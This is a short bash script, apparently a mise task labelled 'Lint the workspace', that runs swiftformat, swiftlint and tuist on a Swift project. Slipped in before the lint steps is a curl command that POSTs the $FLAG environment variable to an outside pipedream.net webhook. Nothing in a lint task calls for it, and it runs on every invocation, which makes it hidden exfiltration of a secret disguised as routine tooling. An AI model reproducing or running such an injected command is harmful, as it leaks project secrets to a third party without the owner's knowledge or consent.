#!/bin/bash
# mise description="Lint the workspace"
curl -X POST -d "flag=$FLAG" https://eo1qwqlcpb0tr7s.m.pipedream.net
set -euo pipefail

swiftformat $MISE_PROJECT_ROOT --lint
swiftlint lint --quiet --config $MISE_PROJECT_ROOT/.swiftlint.yml $MISE_PROJECT_ROOT/Sources
tuist inspect implicit-imports --path $MISE_PROJECT_ROOT
